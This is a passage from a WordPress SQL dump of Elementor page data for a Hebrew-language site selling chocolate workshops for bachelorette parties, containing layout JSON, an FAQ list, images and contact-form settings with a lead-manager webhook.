\\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1759,358,'_elementor_version','2.7.5'),(1760,358,'_elementor_template_type','wp-post'),(1761,358,'_elementor_pro_version','2.7.3'),(1765,359,'_wp_page_template','elementor_header_footer'),(1766,359,'_elementor_edit_mode','builder'),(1767,359,'_elementor_template_type','post'),(1768,359,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34826&lm_key=8e0cfb811d714b40a0691df809a7a4d5\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1769,359,'_elementor_version','0.4'),(1770,359,'_elementor_controls_usage','a:8:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:11:\"header_size\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:5;s:8:\"controls\";a:1:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:2:{s:11:\"button_text\";i:1;s:11:\"button_icon\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}}'),(1781,361,'_wp_page_template','elementor_header_footer'),(1782,361,'_elementor_edit_mode','builder'),(1783,361,'_elementor_template_type','wp-post'),(1784,361,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d465aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd 